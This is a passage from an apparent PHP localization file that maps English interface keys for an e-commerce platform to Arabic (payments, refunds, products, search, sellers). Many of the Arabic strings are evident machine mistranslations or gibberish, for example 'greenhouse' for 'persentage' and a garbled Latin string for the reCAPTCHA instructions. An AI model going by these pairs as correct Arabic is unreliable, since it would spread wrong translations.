'PayMob يدعم عملة EGP', 'paypal' => 'PayPal', 'paypal_Secret' => 'سر PayPal', 'paystack' => 'PayStack', 'paytabs' => 'Paytabs', 'paytabs invoices' => 'فواتير Paytabs', 'paytm' => 'paytm', 'paytm_merchant_key' => 'مفتاح تاجر Paytm', 'paytm_merchant_mid' => 'Paytm Merchant Mid', 'paytm_merchant_website' => 'موقع Paytm Merchant', 'pc' => 'الكمبيوتر', 'pc_' => 'الكمبيوتر', 'pending' => 'قيد الانتظار', 'pending_Products' => 'المنتجات المعلقة', 'pending_Refund_Requests' => 'في انتظار طلبات الاسترداد', 'pending_Request' => 'طلب معلق', 'pending_Withdraw' => 'في انتظار سحب', 'pending_Withdraws' => 'معلقة الانسحاب', 'pending_amount' => 'المبلغ المعلق', 'pending_withdraw' => 'في انتظار سحب', 'percent' => 'نسبه مئويه', 'percentage' => 'نسبة مئوية', 'percentage (%)' => 'نسبة مئوية (٪)', 'percentage_of_loyalty_point_on_order_amount' => 'النسبة المئوية من نقطة الولاء على مبلغ الطلب', 'permanent' => 'دائم', 'persentage (%)' => 'دفيئة (٪)', 'personal_details' => 'تفاصيل شخصية', 'phone' => 'هاتف', 'phone (OTP)' => 'الهاتف (OTP)', 'phone_name' => 'اسم الهاتف', 'phone_number' => 'رقم التليفون', 'phone_number_already_has_been_taken' => 'تم أخذ رقم الهاتف بالفعل', 'physical' => 'بدني', 'pinterest' => 'بينتيريست', 'pixel_analytics_script' => 'Pixel Analytics Script', 'pixel_analytics_script_from_facebook' => 'السيناريو تحليلات بكسل من Facebook', 'pixel_analytics_your_pixel_id' => 'Pixel Analytics معرف البكسل الخاص بك', 'pixel_analytics_your_pixel_id_from_facebook' => 'Pixel Analytics معرف البكسل الخاص بك من Facebook', 'place_Holder' => 'حامل مكان', 'place_Order' => 'مكان الامر', 'placeholder' => 'عنصر نائب', 'placeholder_text' => 'نص العنصر النائب', 'play_store_download_link' => 'Play Store Download Link', 'please' => 'لو سمحت', 'please input the right ids.' => 'يرجى إدخال المعرفات الصحيحة.', 'please write the message' => 'الرجاء كتابة الرسالة', 'please!!' => 'لو سمحت!!', 'please_ReType_Password' => 'يرجى إعادة تربية كلمة المرور', 'please_Verify_that_its_you' => 'يرجى التحقق من أنه أنت.', 'please_Verify_that_itâs_you.' => 'يرجى التحقق من أنه أنت.', 'please_be_reminded_that_you_have_to_setup_data_for_these_section_for' => 'يرجى تذكير أنه يجب عليك إعداد البيانات لهذه القسم', 'please_be_reminded_that_you_have_to_setup_data_for_these_section_for_aster_theme.' => 'يرجى تذكير أنه يجب عليك إعداد البيانات لهذه القسم لموضوع ASTER.', 'please_check_the_recaptcha' => 'يرجى التحقق من recaptcha', 'please_check_your_SMS_for_OTP' => 'يرجى التحقق من الرسائل القصيرة الخاصة بك لـ OTP', 'please_choose_all_the_options' => 'الرجاء اختيار كل الخيارات', 'please_click_save_information_button_below_to_save_all_the_changes' => 'يرجى النقر فوق زر حفظ المعلومات أدناه لحفظ جميع التغييرات', 'please_click_the_Save_button_below_to_save_all_the_changes' => 'يرجى النقر فوق الزر ظ أدناه لحفظ جميع التغييرات', 'please_confirm_your_verified_account_to_pay_through_your_bank_account' => 'يرجى تأكيد حسابك الذي تم التحقق منه للدفع من خلال حسابك المصرفي', 'please_contact_with_deliveryman_to_confirm_your_pay_and_receive_your_order.' => 'يرجى الاتصال بـ DeliveryMan لتأكيد راتبك واستلام طلبك.', 'please_do_not_forget_to_notify_your_sellers_about_these_changes.' => 'من فضلك لا تنس أن تخطر البائعين عن هذه التغييرات.', 'please_enter_valid_email_address' => 'الرجاء إدخال عنوان بريد إلكتروني صالح', 'please_enter_your_email_to_send_a_verification_code_for_forget_password' => 'الرجاء إدخال بريدك الإلكتروني لإرسال رمز التحقق من أجل نسيان كلمة المرور', 'please_enter_your_first_name' => 'يرجى ادخال الاسم الاول', 'please_enter_your_last_name' => 'الرجاء إدخال اسمك الأخير', 'please_enter_your_phone_number' => 'يرجى إدخال رقم الهاتف الخاص بك', 'please_enter_zip_code' => 'الرجاء إدخال الرمز البريدي', 'please_go_back_to_the_homepage' => 'يرجى العودة إلى الصفحة الرئيسية', 'please_make_sure' => 'الرجاء التأكد', 'please_make_sure_all_the product s_delivery_charges_are_up_to_date.' => 'يرجى التأكد من أن جميع رسوم تسليم المنتج محدثة.', 'please_make_sure_all_the product`s_delivery_charges_are_up_to_date.' => 'يرجى التأكد من أن جميع رسوم تسليم المنتج محدثة.', 'please_only_input_png_or_jpg_type_file' => 'يرجى فقط إدخال ملف نوع PNG أو JPG', 'please_provide_coupon_code' => 'يرجى تقديم رمز القسيمة', 'please_provide_embed_link_not_direct_link' => 'يرجى تقديم رابط التضمين وليس الرابط المباشر', 'please_provide_valid_email' => 'يرجى تقديم بريد إلكتروني صالح', 'please_provide_valid_email_address.' => 'يرجى تقديم عنوان بريد إلكتروني صالح.', 'please_provide_valid_email_or_phone_number' => 'يرجى تقديم بريد إلكتروني أو رقم هاتف صالح', 'please_select_a_payment_Methods' => 'الرجاء تحديد طرق الدفع', 'please_try_again_after_' => 'الرجاء المحاولة مرة أخرى بعد', 'please_type_verify_code' => 'الرجاء كتابة الكود التحقق', 'please_verify_that_itâs_you.' => 'يرجى التحقق من أنه أنت.', 'please_wait_for_new_code.' => 'يرجى انتظار رمز جديد.', 'please_write_the_message' => 'الرجاء كتابة الرسالة', 'point' => 'نقطة', 'point to wallet' => 'تشير إلى محفظة', 'point_can_earn_by_placing_order_or_referral' => 'يمكن أن تكسب النقطة عن طريق تقديم الطلب أو الإحالة', 'point_is_equal_to' => 'النقطة تساوي', 'point_to_wallet' => 'تشير إلى محفظة', 'point_transaction_history' => 'تاريخ المعاملة النقطة', 'points_required_to_convert' => 'النقاط المطلوبة للتحويل', 'poor' => 'فقير', 'popular_tags' => 'الكلمات الشعبية', 'popup_Banner' => 'لافتة منبثقة', 'popup_banner_form' => 'شكل لافتة منبثقة', 'port' => 'ميناء', 'pos' => 'نقاط البيع', 'pos management' => 'إدارة نقاط البيع', 'pos_management' => 'إدارة نقاط البيع', 'pos_order' => 'ترتيب نقاط', 'pos_orders' => 'أوامر POS', 'positive' => 'إيجابي', 'positive_review' => 'مراجعة إيجابية', 'post_max_size' => 'ما بعد الحجم كحد أقصى', 'preparing_Shipment' => 'إعداد الشحنة', 'press' => 'يضعط', 'press_Submit' => 'إرسال إرسال', 'previous' => 'سابق', 'previous_shipping_cost' => 'تكلفة الشحن السابقة', 'price' => 'سعر', 'price_comparisons' => 'مقارنات الأسعار', 'price_information' => 'معلومات السعر', 'price_range' => 'نطاق السعر', 'pricing_&_others' => 'التسعير والآخرين', 'primary_Color' => 'لون أصلي', 'primary_Light_Color' => 'لون الضوء الأساسي', 'print' => 'مطبعة', 'print_Invoice' => 'فاتورة طباعة', 'print__Invoice' => 'فاتورة طباعة', 'print_invoice' => 'فاتورة طباعة', 'priority' => 'أولوية', 'privacy_policy' => 'سياسة الخصوصية', 'privateKey' => 'مفتاح سري', 'private_Key' => 'مفتاح سري', 'problem' => 'مشكلة', 'proceed' => 'يتابع', 'proceed_payment' => 'متابعة الدفع', 'proceed_shipping' => 'المضي قدما الشحن', 'proceed_to_checkout' => 'الشروع في الخروج', 'proceed_to_next' => 'انتقل إلى التالي', 'processed' => 'معالجة', 'processing' => 'يعالج', 'processing_order' => 'معالجة الطلب', 'product' => 'منتج', 'product 1' => 'المنتج 1', 'product 2' => 'المنتج 2', 'product 50%' => 'المنتج 50 ٪', 'product Name' => 'اسم المنتج', 'product Type' => 'نوع المنتج', 'product added successfully' => 'تمت إضافة المنتج بنجاح', 'product asdfghjkl ' => 'منتج ASDFGHJKL', 'product compares' => 'المنتج يقارن', 'product management' => 'ادارة المنتج', 'product stocks' => 'أسهم المنتج', 'product tag' => 'علامة المنتج', 'product updated successfully!' => 'تم تحديث المنتج بنجاح!', 'product wise' => 'المنتج الحكيم', 'product_Add' => 'إضافة المنتج', 'product_Attributes' => 'سمات المنتج', 'product_Bulk_Import' => 'المنتج بالجملة استيراد', 'product_Discount' => 'خصم المنتج', 'product_Edit' => 'تحرير المنتج', 'product_Edit dsf' => 'تحرير المنتج DSF', 'product_Image' => 'صورة المنتج', 'product_Info' => 'معلومات المنتج', 'product_List' => 'قائمة المنتج', 'product_Name' => 'اسم المنتج', 'product_Preview' => 'معاينة المنتج', 'product_Report' => 'تقرير المنتج', 'product_Reviews' => 'تعليقات المنتج', 'product_Section' => 'قسم المنتج', 'product_Setup' => 'إعداد المنتج', 'product_Statistics' => 'إحصائيات المنتج', 'product_Stock' => 'مخزون المنتج', 'product_Table' => 'جدول المنتج', 'product_Type' => 'نوع المنتج', 'product_Unit_Price' => 'سعر وحدة المنتج', 'product_Updated_Requests' => 'طلبات محدثة المنتج', 'product_add' => 'إضافة المنتج', 'product_added_successfully' => 'تمت إضافة المنتج بنجاح', 'product_already_added_in_cart' => 'تم إضافة المنتج بالفعل في العربة', 'product_code_sku' => 'رمز المنتج SKU', 'product_comparison' => 'مقارنة السلعة', 'product_details' => 'تفاصيل المنتج', 'product_discount' => 'خصم المنتج', 'product_dispatched' => 'تم إرسال المنتج', 'product_edit' => 'تحرير المنتج', 'product_in_wishlist' => 'المنتج في قائمة الأمنيات', 'product_info' => 'معلومات المنتج', 'product_list' => 'قائمة المنتج', 'product_management' => 'ادارة المنتج', 'product_must_be_approved' => 'يجب الموافقة على المنتج', 'product_name' => 'اسم المنتج', 'product_name_not_found' => 'اسم المنتج لم يتم العثور عليه', 'product_not_available' => 'المنتج غير متوفر', 'product_not_found' => 'الصنف غير موجود', 'product_of_this_year' => 'منتج هذا العام', 'product_on_delivery' => 'المنتج عند التسليم', 'product_price_&_stock' => 'سعر المنتج والسهم', 'product_quantity_can_not_be_less_than_0_!' => 'لا يمكن أن تكون كمية المنتج أقل من 0!', 'product_quantity_can_not_be_zero_or_less_than_zero_in_cart' => 'لا يمكن أن تكون كمية المنتج صفرًا أو أقل من الصفر في العربة', 'product_quantity_is_not_enough' => 'كمية المنتج ليست كافية', 'product_quantity_is_not_enough!' => 'كمية المنتج ليست كافية!', 'product_quantity_updated' => 'تم تحديث كمية المنتج', 'product_quantity_updated_successfully!' => 'تم تحديث كمية المنتج بنجاح!', 'product_refund_validity' => 'استرداد المنتج صحة', 'product_removed_successfully' => 'تمت إزالة المنتج بنجاح', 'product_report' => 'تقرير المنتج', 'product_review' => 'تقييم المنتج', 'product_review_not_available' => 'مراجعة المنتج غير متوفرة', 'product_setting' => 'إعداد المنتج', 'product_settings' => 'إعدادات المنتج', 'product_sku' => 'منتج SKU', 'product_stock' => 'مخزون المنتج', 'product_table' => 'جدول المنتج', 'product_thumbnail' => 'الصورة المصغرة', 'product_type' => 'نوع المنتج', 'product_updated_successfully' => 'تم تحديث المنتج بنجاح', 'product_variation_setup' => 'إعداد تباين المنتج', 'product_video' => 'فيديو المنتج', 'product_wise' => 'المنتج الحكيم', 'product_wise_discounted_amount_will_be_shown_here' => 'سيتم عرض مبلغ مخفضة للمنتج هنا', 'product_wise_shipping_cost' => 'تكلفة الشحن الحكيمة للمنتج', 'product_wise_shipping_cost_approval' => 'المنتج الموافقة على تكلفة الشحن', 'products' => 'منتجات', 'profile' => 'حساب تعريفي', 'profile_Image' => 'صورة الملف الشخصي', 'profile_Info' => 'معلومات الشخصي', 'profile_Settings' => 'إعدادات الملف الشخصي', 'profile_id' => 'Profile id', 'profile_info' => 'معلومات الشخصي', 'promo_banner_bottom' => 'ترويجي لافتة أسفل', 'promo_banner_left' => 'لافتة الترويج اليسار', 'promo_banner_middle_bottom' => 'القاع الترويجي لافتة الأوسط', 'promo_banner_middle_top' => 'قمة لافتة الترويجي', 'promo_banner_right' => 'لافتة الترويج الحق', 'promotion management' => 'إدارة الترويج', 'promotion_management' => 'إدارة الترويج', 'promotional_Banners' => 'لافتات ترويجية', 'provide' => 'يمد', 'provide phone number & press' => 'توفير رقم الهاتف واضغط', 'provide the' => 'توفير', 'provide_Primary_Email_and_press' => 'توفير البريد الإلكتروني الأساسي والضغط', 'provide_a_WhatsApp_number_without_country_code' => 'قدم رقم WhatsApp بدون رمز البلد', 'provide_the' => 'توفير', 'public' => 'عام', 'publicKey' => 'المفتاح العمومي', 'public_Key' => 'المفتاح العمومي', 'publish' => 'ينشر', 'published' => 'نشرت', 'published_key' => 'المفتاح المنشور', 'puma' => 'بوما', 'purchase_code' => 'كود شراء', 'purchase_price' => 'سعر الشراء', 'purchase_price ($)' => 'سعر الشراء ($)', 'purchese_price' => 'شراء السعر', 'push_Notification' => 'إشعار دفع', 'push_Notification_Setup' => 'دفع الإخطار', 'push_notification' => 'إشعار دفع', 'push_notification_table' => 'جدول الإخطار', 'put_a_description_and_also_identifier_(identifier that used for app)_and_this_is_the' => 'ضع وصفًا ومعرفًا أيضًا (معرف يستخدم للتطبيق) وهذا هو', 'qty' => 'كتي', 'quantity' => 'كمية', 'quantity_sort_by_(high_to_low)' => 'نوع الكمية (عالية إلى منخفضة)', 'quantity_sort_by_(low_to_high)' => 'فرز الكمية بواسطة (منخفضة إلى عالية)', 'quantity_update' => 'تحديث الكمية', 'quick_links' => 'روابط سريعة', 'quick_view' => 'نظرة سريعة', 'qwert' => 'Qwert', 'qwertyu' => 'Qwertyu', 'range' => 'يتراوح', 'rating' => 'تقييم', 'rating_High_to_Low' => 'تقييم مرتفع إلى منخفض', 'rating_Low_to_High' => 'تصنيف منخفض إلى مرتفع', 'ratings' => 'تقييمات', 'ratio' => 'نسبة', 'ratio 1= 1' => 'نسبة 1=> 1', 'ratio 1= 1 ' => 'نسبة 1=> 1', 'razor_pay' => 'أجر الشفرة', 're' => 'يكرر', 'reCAPTCHA Type' => 'نوع recaptcha', 'reCAPTCHA_is_now_enabled_for_added_security.Users_may_be_prompted_to_complete_a_reCAPTCHA_challenge_to_verify_their_human_identity_and protect_against_spam_and_malicious_activity' => 'تم تمكين Recaptcha الآن من أجل مزيد', 'reCaptcha' => 'recaptcha', 'reCaptcha Setup' => 'الإعداد recaptcha', 'reCaptcha credential Set up Instructions' => 'RECAPTCHA CENSERINCES ENTRESS', 'reCaptcha_Setup' => 'الإعداد recaptcha', 'reached_maximum' => 'وصلت إلى الحد الأقصى', 'read_Before_Change_Theme' => 'اقرأ قبل تغيير الموضوع', 'read_documentation' => 'قراءة الوثائق', 'read_instructions' => 'قراءة التعليمات', 'read_more' => 'اقرأ أكثر', 'ready_After_Sell' => 'جاهز بعد البيع', 'ready_Product' => 'منتج جاهز', 'ready_product_upload' => 'تحميل المنتج جاهز', 'ready_to_Leave' => 'على استعداد للمغادرة', 'recaptcha' => 'recaptcha', 'received_by' => 'استلمت من قبل', 'receiver_info' => 'معلومات المتلقي', 'recommended' => 'مُستَحسَن', 'recommended_for_you' => 'موصى به لك', 'recommended_product' => 'المنتج الموصى به', 'recurring' => 'يتكرر', 'redirecting_to_the_payment' => 'إعادة التوجيه إلى الدفع', 'refer_&_Earn' => 'الرجوع والكسب', 'refer_&_earn' => 'الرجوع والكسب', 'refer_code' => 'الرجوع إلى الرمز', 'reference' => 'مرجع', 'reference_Code' => 'الرمز المرجعي', 'refund' => 'استرداد', 'refund policy' => 'سياسة الاسترجاع', 'refund requests' => 'طلبات الاسترداد', 'refund statuses' => 'استرداد الحالات', 'refund transactions' => 'معاملات استرداد', 'refund-policy' => 'سياسة الاسترجاع', 'refund_Given' => 'استرداد', 'refund_Rate' => 'معدل الاسترداد', 'refund_Request_List' => 'قائمة طلب الاسترداد', 'refund_Requests' => 'طلبات الاسترداد', 'refund_Transactions' => 'معاملات استرداد', 'refund_approved' => 'استرداد الموافقة', 'refund_day_limit_updated!!' => 'استرداد الحد الأقصى يوم تحديث !!', 'refund_details' => 'تفاصيل استرداد', 'refund_given' => 'استرداد', 'refund_id' => 'معرف الاسترداد', 'refund_list' => 'قائمة استرداد', 'refund_management' => 'إدارة المبلغ', 'refund_order' => 'ترتيب استرداد', 'refund_order_validity' => 'استرداد صحة الطلب', 'refund_pending' => 'استرداد معلق', 'refund_placed_successfully' => 'استرداد المبلغ بنجاح', 'refund_policy' => 'سياسة الاسترجاع', 'refund_reason' => 'سبب استرداد', 'refund_refunded' => 'استرداد الأموال', 'refund_rejected' => 'رفض المبلغ', 'refund_request' => 'طلب ارجاع', 'refund_request_after_order_within' => 'طلب استرداد بعد الطلب في الداخل', 'refund_request_canceled_message' => 'طلب استرداد الرسائل الملغاة', 'refund_request_day_limit' => 'حد طلب الاسترداد', 'refund_request_id' => 'معرف طلب الاسترداد', 'refund_request_list' => 'قائمة طلب الاسترداد', 'refund_request_time_limit' => 'الحد الزمني لطلب الاسترداد', 'refund_requested_successful!!' => 'طلب استرداد النجاح !!', 'refund_requests' => 'طلبات الاسترداد', 'refund_reson' => 'استرداد الرنين', 'refund_settings' => 'إعدادات الاسترداد', 'refund_setup' => 'إعداد استرداد', 'refund_status' => 'حالة الاسترداد', 'refund_status_change_log' => 'سجل تغيير حالة الاسترداد', 'refund_status_changed_log' => 'تم تغيير السجل الذي تم تغيير حالة الأموال', 'refund_status_updated!!' => 'تم تحديث حالة الاسترداد !!', 'refund_status_updated_successfully!!' => 'تم تحديث حالة الاسترداد بنجاح !!', 'refund_to_wallet' => 'استرداد المحفظة', 'refund_to_wallet_hint' => 'استرداد تلميح المحفظة', 'refund_transaction_table' => 'جدول المعاملة استرداد', 'refund_transactions' => 'معاملات استرداد', 'refunded' => 'استرداد', 'refunded status can not be changed!!' => 'لا يمكن تغيير الحالة المستردة !!', 'refunded status can not be changed!! Admin already change the statusapproved!!' => 'لا يمكن تغيير الحالة المستردة !! المسؤول بالفعل تغيير statusapped!', 'refunded status can not be changed!! Admin already changed the status = approved!!' => 'لا يمكن تغيير الحالة المستردة !! المسؤول بالفعل غير الحالة=> تمت الموافقة عليها !!', 'refunded status can not be changed!! Admin already changed the status = rejected!!' => 'لا يمكن تغيير الحالة المستردة !! المسؤول قد غير الوضع بالفعل=> رفض !!', 'register' => 'يسجل', 'register_control_your_order' => 'سجل التحكم في طلبك', 'register_control_your_order.' => 'سجل التحكم في طلبك.', 'registration_success_login_now' => 'تسجيل الدخول نجاح التسجيل الآن', 'regular wear' => 'ارتداء منتظم', 'reject' => 'يرفض', 'rejected' => 'مرفوض', 'rejected_note' => 'ملاحظة مرفوضة', 'rejected_reason' => 'سبب رفض', 'releans_sms' => 'SMS RELEANS', 'remaining_balance' => 'الرصيد المتبقي', 'remember_me' => 'تذكرنى', 'remove' => 'يزيل', 'remove_all' => 'حذف الكل', 'rename_company' => 'إعادة تسمية الشركة', 'rename_your_website' => 'أعد تسمية موقع الويب الخاص بك', 'reorder' => 'إعادة ترتيب', 'repeat' => 'يكرر', 'repeat_password' => 'اعد كلمة السر', 'repeat_password_not_match' => 'كرر كلمة المرور لا تتطابق', 'reply' => 'رد', 'report' => 'تقرير', 'reports' => 'التقارير', 'reports_&_Analysis' => 'التقارير والتحليل', 'reports_and_analytics' => 'التقارير والتحليلات', 'request' => 'طلب', 'request_time' => 'طلب الوقت', 'required_Info_From_Customer' => 'معلومات مطلوبة من العميل', 'required_Information_from_Customer' => 'مطلوب معلومات من العميل', 'reschedule' => 'إعادة جدولة', 'resend' => 'إعادة إرسال', 'resend_OTP' => 'إعادة إرسال OTP', 'resend_code_within' => 'إعادة تقديم رمز في الداخل', 'resend_notification' => 'إعادة تقديم الإخطار', 'reset' => 'إعادة ضبط', 'resource_type' => 'نوع المورد', 'responsibility' => 'مسؤولية', 'restaurant' => 'مطعم', 'resubmit' => 'إعادة تقديم', 'resume' => 'سيرة ذاتية', 'return policy' => 'سياسة العائدات', 'return-policy' => 'سياسة العائدات', 'return_policy' => 'سياسة العائدات', 'returned' => 'عاد', 'returned_orders' => 'أوامر عاد', 'reund_requests' => 'طلبات إعادة', 'review' => 'مراجعة', 'review_List' => 'قائمة المراجعة', 'review_list' => 'قائمة المراجعة', 'review_table' => 'جدول المراجعة', 'reviewer' => 'المراجع', 'reviews' => 'المراجعات', 'right' => 'يمين', 'roduct_list' => 'قائمة Roduct', 'role_form' => 'شكل الدور', 'role_name' => 'اسم الدور', 'roles_table' => 'جدول الأدوار', 'root' => 'جذر', 'rtgr' => 'RTGR', 'safe_Payment' => 'الدفع الآمن', 'safe_payment' => 'الدفع الآمن', 'sale' => 'أُوكَازيُون', 'sale_report' => 'تقرير البيع', 'sales' => 'مبيعات', 'sales_&_Transaction_Report' => 'تقرير المبيعات والمعاملات', 'sales_Commission' => 'لجنة المبيعات', 'same' => 'نفس', 'same_as_delivery_address' => 'نفس عنوان التسليم', 'same_as_shipping_address' => 'نفس عنوان الشحن', 'sandbox' => 'صندوق الرمل', 'save' => 'يحفظ', 'save_Changes' => 'حفظ التغييرات', 'save_changes' => 'حفظ التغييرات', 'save_information' => 'حفظ المعلومات', 'save_informtion' => 'حفظ المعلومات', 'save_the_settings' => 'احفظ الإعدادات', 'save_this_Address' => 'احفظ هذا العنوان', 'save_this_address' => 'احفظ هذا العنوان', 'saved_addresses' => 'العناوين المحفوظة', 'search' => 'يبحث', 'search functions' => 'وظائف البحث', 'search...' => 'يبحث...', 'search_Brands' => 'البحث العلامات التجارية', 'search_By_Order_Id' => 'البحث حسب معرف الطلب', 'search_Method_Name' => 'اسم طريقة البحث', 'search_Product_Name' => 'بحث اسم المنتج', 'search_Ticket_by_Subject_or_status' => 'ابحث عن تذكرة حسب الموضوع أو الحالة', 'search_brand' => 'البحث العلامة التجارية', 'search_by_Attribute_Name' => 'البحث عن طريق اسم السمة', 'search_by_Banner_Type' => 'ابحث حسب نوع الراية', 'search_by_ID_or_name' => 'ابحث عن طريق الهوية أو الاسم', 'search_by_Name_or_Category' => 'البحث بالاسم أو الفئة', 'search_by_Name_or_Email_or_Phone' => 'ابحث بالاسم أو البريد الإلكتروني أو الهاتف', 'search_by_Name_or_Mobile_No_or_Email' => 'ابحث بالاسم أو الهاتف المحمول أو البريد الإلكتروني', 'search_by_Name_or_Phone_or_Email' => 'ابحث بالاسم أو الهاتف أو البريد الإلكتروني', 'search_by_Order_ID' => 'البحث حسب معرف الطلب', 'search_by_Order_ID_or_Transaction_ID' => 'البحث حسب معرف الطلب أو معرف المعاملة', 'search_by_Product_Name' => 'البحث باسم المنتج', 'search_by_Product_or_Customer' => 'ابحث حسب المنتج أو العميل', 'search_by_Title' => 'البحث عن طريق العنوان', 'search_by_Title_or_Code_or_Discount_Type' => 'ابحث حسب العنوان أو الرمز أو نوع الخصم', 'search_by_brands' => 'البحث من قبل العلامات التجارية', 'search_by_email' => 'ابحث عن طريق البريد الإلكتروني', 'search_by_name' => 'البحث عن طريق الإسم', 'search_by_name_or_category' => 'البحث بالاسم أو الفئة', 'search_by_name_or_email_or_phone' => 'ابحث بالاسم أو البريد الإلكتروني أو الهاتف', 'search_by_name_oremail_or_phone' => 'ابحث بالاسم oremail أو الهاتف', 'search_by_order_ID' => 'البحث حسب معرف الطلب', 'search_by_order_id' => 'البحث حسب معرف الطلب', 'search_by_order_id_or_refund_id' => 'البحث حسب معرف الطلب أو معرف الاسترداد', 'search_by_orders_id' => 'ابحث حسب أوامر معرف', 'search_by_orders_id_or_refund_id' => 'ابحث عن طريق معرف الطلبات أو معرف الاسترداد', 'search_by_orders_id_or_transaction_ID' => 'ابحث عن طريق معرف الطلبات أو معرف المعاملة', 'search_by_orders_id_or_transaction_id' => 'ابحث عن طريق معرف الطلبات أو معرف المعاملة', 'search_by_product_name' => 'البحث باسم المنتج', 'search_by_title' => 'البحث عن طريق العنوان', 'search_customers' => 'بحث العملاء', 'search_data' => 'بيانات البحث', 'search_for_items_or_store' => 'ابحث عن العناصر أو المتجر', 'search_here' => 'ابحث هنا', 'search_menu' => 'قائمة البحث', 'search_orders' => 'تقسيمات البحث', 'search_product_name' => 'بحث اسم المنتج', 'search_products' => 'البحث عن المنتجات', 'search_products_from_this_store' => 'البحث عن منتجات من هذا المتجر', 'search_role' => 'دور البحث', 'search_store' => 'متجر البحث', 'search_tags' => 'علامات البحث', 'search_your_location_here' => 'ابحث في موقعك هنا', 'sec' => 'ثانية', 'second_step' => 'الخطوة الثانية', 'secondary_Color' => 'اللون الثانوي', 'secondary_banner_form' => 'شكل لافتة ثانوي', 'seconds' => 'ثوان', 'secret' => 'سر', 'secretKey' => 'Secretkey', 'secret_Key' => 'المفتاح السري', 'secret_key' => 'المفتاح السري', 'secured_information' => 'المعلومات المضمونة', 'security_code' => 'رمز الحماية', 'security_key' => 'Security key', 'see_Credential_Setup_Instructions' => 'انظر تعليمات إعداد بيانات الاعتماد', 'see_More' => 'شاهد المزيد', 'see_all' => 'اظهار الكل', 'see_all_products' => 'شاهد جميع المنتجات', 'see_more' => 'شاهد المزيد', 'see_the_latest_deals_and_exciting_new_offers' => 'شاهد أحدث الصفقات والعروض الجديدة المثيرة', 'select' => 'يختار', 'select minimum one box' => 'حدد مربعًا واحدًا أقل', 'select_Brand' => 'حدد العلامة التجارية', 'select_Coupon_Type' => 'حدد نوع القسيمة', 'select_Date_Range' => 'حدد نطاق التاريخ', 'select_Logout_below_if_you_are_ready_to_end_your_current_session' => 'حدد تسجيل الدخول أدناه إذا كنت مستعدًا لإنهاء جلستك الحالية', 'select_Payment_Method' => 'اختار طريقة الدفع', 'select_Product' => 'حدد المنتج', 'select_Sub_Category' => 'حدد الفئة الفرعية', 'select_Sub_Sub_Category' => 'حدد الفئة الفرعية الفرعية', 'select_a_payment_method first' => 'حدد طريقة الدفع أولاً', 'select_an_app_type_and_press' => 'حدد نوع التطبيق واضغط', 'select_app_IDs' => 'حدد معرفات التطبيق', 'select_attributes' => 'حدد السمات', 'select_brand' => 'حدد العلامة التجارية', 'select_category' => 'اختر الفئة', 'select_colors' => 'حدد الألوان', 'select_country' => 'حدد الدولة', 'select_coupon_bearer' => 'حدد حامل القسيمة', 'select_coupon_type' => 'حدد نوع القسيمة', 'select_customer' => 'حدد العميل', 'select_customer_is_required' => 'اختيار العميل مطلوب', 'select_customer_is_required!' => 'اختيار العميل مطلوب!', 'select_date_range' => 'حدد نطاق التاريخ', 'select_from_saved' => 'اختر من المحفوظ', 'select_minimum_one_selection_box' => 'حدد مربع اختيار واحد الحد الأدنى', 'select_payment_method' => 'اختار طريقة الدفع', 'select_product' => 'حدد المنتج', 'select_reCAPTCHA_v2_as_ReCAPTCHA_Type' => 'حدد recaptcha v2 كنوع recaptcha', 'select_seller' => 'حدد البائع', 'select_seller_is_required' => 'اختيار البائع مطلوب', 'select_seller_is_required!' => 'اختيار البائع مطلوب!', 'select_service_IDs' => 'حدد معرفات الخدمة', 'select_shipping_method_first' => 'حدد طريقة الشحن أولاً', 'select_status' => 'حدد الحالة', 'select_sub_type' => 'حدد النوع الفرعي', 'select_subcategory' => 'حدد الفئة الفرعية', 'select_the' => 'حدد', 'select_theme' => 'اختر نمطا', 'select_transaction_type' => 'حدد نوع المعاملة', 'select_variation' => 'حدد التباين', 'select_your_desire_category.' => 'حدد فئة الرغبة الخاصة بك.', 'select_your_theme' => 'حدد موضوعك', 'selected' => 'المحدد', 'self_delivery' => 'التسليم الذاتي', 'self_product' => 'المنتج الذاتي', 'sell_Digital_product' => 'بيع المنتج الرقمي', 'sell_on' => 'بيع على', 'seller' => 'تاجر', 'seller added successfully' => 'وأضاف البائع بنجاح', 'seller product test' => 'اختبار المنتج البائع', 'seller shipping' => 'البائع الشحن', 'seller test digital product 2' => 'بائع اختبار المنتج الرقمي 2', 'seller test product 1' => 'منتج اختبار البائع 1', 'seller variation wise product' => 'منتج تباين البائع الحكيمة', 'seller wallet histor...' => 'بائع محفظة التاريخ ...', 'seller wallets' => 'محافظ البائع', 'seller-Info' => 'البائع-إنفو', 'seller_Details' => 'تفاصيل البائع', 'seller_Discount' => 'خصم البائع', 'seller_Earning' => 'كسب البائع', 'seller_Image' => 'صورة البائع', 'seller_Info' => 'معلومات البائع', 'seller_Information' => 'معلومات البائع', 'seller_List' => 'قائمة البائع', 'seller_Net_Income' => 'صافي الدخل البائع', 'seller_Order' => 'طلب البائع', 'seller_Orders' => 'أوامر البائع', 'seller_POS' => 'بائع نقاط', 'seller_Product_List' => 'قائمة منتج البائع', 'seller_Products' => 'منتجات البائع', 'seller_Reports' => 'تقارير البائع', 'seller_Sales' => 'مبيعات البائع', 'seller_Wallet' => 'محفظة البائع', 'seller_Wallet_Status' => 'وضع محفظة البائع', 'seller_amount' => 'مبلغ البائع', 'seller_app_version_control' => 'التحكم في إصدار تطبيق البائع', 'seller_apply' => 'البائع تطبيق', 'seller_b' => 'البائع ب', 'seller_can_set_own_shop_order_limit_individually' => 'يمكن للبائع تعيين حد طلب المتجر الخاص بشكل فردي', 'seller_details' => 'تفاصيل البائع', 'seller_discount' => 'خصم البائع', 'seller_earnings' => 'أرباح البائع', 'seller_email' => 'البريد الإلكتروني البائع', 'seller_image' => 'صورة البائع', 'seller_info' => 'معلومات البائع', 'seller_information' => 'معلومات البائع', 'seller_is' => 'البائع هو', 'seller_list' => 'قائمة البائع', 'seller_login' => 'تسجيل الدخول البائع', 'seller_name' => 'البائع اسم', 'seller_net_income' => 'صافي الدخل البائع', 'seller_phone' => 'هاتف البائع', 'seller_pos_permission_updated.' => 'البائع POS إذن تم تحديثه.', 'seller_product_sale_Report' => 'تقرير بيع منتج البائع', 'seller_reg' => 'البائع ريج', 'seller_registration' => 'تسجيل البائع', 'seller_settings' => 'إعدادات البائع', 'seller_setup' => 'إعداد البائع', 'seller_shipping_method' => 'طريقة الشحن البائع', 'seller_table' => 'جدول البائع', 'seller_wallet' => 'محفظة البائع', 'seller_wise_shipping' => 'البائع الشحن الحكيمة', 'seller_wise_shipping_method' => 'طريقة الشحن الحكيمة البائع', 'seller_withdraws' => 'البائع 